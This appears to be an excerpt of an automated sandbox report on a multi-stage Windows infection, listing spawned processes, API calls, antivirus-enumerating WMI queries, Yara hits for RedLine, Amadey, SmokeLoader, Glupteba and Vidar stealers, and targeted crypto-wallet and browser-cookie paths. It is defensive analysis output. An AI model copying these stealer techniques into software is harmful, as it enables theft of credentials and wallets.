Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "yiueea.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "yiueea.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\577f58beff" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\577f58beff" /P "user:R" /E
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Process created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 8_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

8_2_00419F90

Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2108090553.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2108090553.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2109082804.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2108090553.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2108090553.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2107696919.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: GetLocaleInfoA,	7_2_004113A2
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_02430AB6
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	7_2_0241C8B7
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	7_2_0242394D
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	7_2_024249EA
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	7_2_02423F87
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	8_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	8_2_00438178
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_00440116
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	8_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	8_2_00438423
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: EnumSystemLocalesW,	8_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: GetLocaleInfoW,	8_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	8_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	8_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	8_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	8_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: EnumSystemLocalesW,	8_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	8_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	8_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	8_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	8_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	9_2_0064090D
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: EnumSystemLocalesW,	9_2_00640C56
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: EnumSystemLocalesW,	9_2_00640CD8
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: EnumSystemLocalesW,	9_2_00640D99
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	9_2_00640E46
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetLocaleInfoW,	9_2_0064112D
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetLocaleInfoEx,	9_2_005E11BC
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_006412A0
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetLocaleInfoW,	9_2_006413E7
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_006414E9
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: EnumSystemLocalesW,	9_2_0062DC82
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: EnumSystemLocalesW,	9_2_0062DE71
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetLocaleInfoEx,FormatMessageA,	9_2_005BA6EC
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: GetLocaleInfoW,	9_2_0062E9CC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000112001\setup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000112001\setup.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000397001\taskhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000397001\taskhost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000398001\winlog.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000398001\winlog.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000399001\msedge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000399001\msedge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_024180F6 cpuid

7_2_024180F6

Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_0040A46E GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_0040A46E

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 8_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

8_2_0042FE47

Source: C:\Users\user\AppData\Local\Temp\958B.exe

8_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\958B.exe

8_2_00419F90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\2899.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Source: build2.exe, 0000002C.00000002.2966408279.0000000002456000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 2352, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 35.2.yiueea.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.C5F5.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yiueea.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.yiueea.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.yiueea.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.C5F5.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000000.2636460288.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.2629932505.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2638422525.0000000000A21000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4498779959.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.2656436321.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2658515111.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\C5F5.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.file.exe.840e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.F3CC.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.vusretg.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vusretg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.F3CC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.F3CC.exe.730e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vusretg.760e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.2734778264.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2370688498.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2802667211.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2056202136.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2316367410.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Glupteba

Source: Yara match	File source: 40.3.2899.exe.5a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.2899.exe.5190e67.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.2899.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2899.exe PID: 4208, type: MEMORYSTR

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000017.00000002.4500899818.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4503622640.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yiueea.exe PID: 5596, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 44.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.build2.exe.3df15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.build2.exe.3df15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.2964943607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2774828170.0000000003DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5428, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectronCash
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR]q
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: build2.exe, 0000002C.00000002.2965262411.0000000000648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
